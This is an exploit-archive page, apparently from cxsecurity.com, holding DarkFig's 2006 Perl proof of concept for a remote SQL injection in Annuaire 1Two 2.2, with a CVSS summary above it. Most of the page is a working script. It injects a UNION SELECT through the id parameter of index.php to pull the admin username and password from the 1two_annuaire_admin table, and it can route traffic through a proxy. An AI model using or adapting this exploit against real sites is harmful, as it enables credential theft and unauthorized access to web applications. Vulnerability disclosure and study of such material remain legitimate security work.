Annuaire 1Two 2.2 Remote SQL Injection Exploit

2006.09.08
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # # Affected.scr..: Annuaire 1Two 2.2 # Poc.ID........: 09060902.txt # Type..........: SQL Injection (without quote) # Risk.level....: Medium # Vendor.Status.: Unpatched # Src.download..: http://www.1two.org/ # Poc.link......: acid-root.new.fr/poc/09060902.txt # Credits.......: DarkFig # # use LWP::UserAgent; use HTTP::Request; use Getopt::Long; use strict; print STDOUT "n+", '-' x 53, "+n"; print STDOUT "| Annuaire 1Two 2.2 Remote SQL Injection Exploit |n"; print STDOUT '+', '-' x 53, "+n"; my($host,$path,$proxh,$proxu,$proxp,); my $opt = GetOptions( 'host=s' => $host, 'path=s' => $path, 'proxh=s' => $proxh, 'proxu=s' => $proxu, 'proxp=s' => $proxp); if(!$host) { print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |n"; print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |n"; print STDOUT '+', '-' x 53, "+n"; exit(0); } if(!$path) {$path = '/';} if($host !~ /http/) {$host = 'http://'.$host;} if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';} my @fi = ('username', 'password'); my $ur = $host.$path.'index.php?id='; my $ua = LWP::UserAgent->new(); $ua->agent('Mozilla XD'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; foreach(@fi) { my $xx = $_; my $re = HTTP::Request->new(GET => $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin"); $re->proxy_authorization_basic($proxu, $proxp) if $proxp; my $xd = $ua->request($re); my $da = $xd->content; if($da =~ /- (.*?)</title>/) { if($xx eq 'username') { print STDOUT " [+]User:";} if($xx eq 'password') { print STDOUT " [+]Passwd:";} print STDOUT " $1n"; } else { print STDOUT "[!]Exploit failedn"; }} print STDOUT "+", '-' x 53, "+n"; exit(0);


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top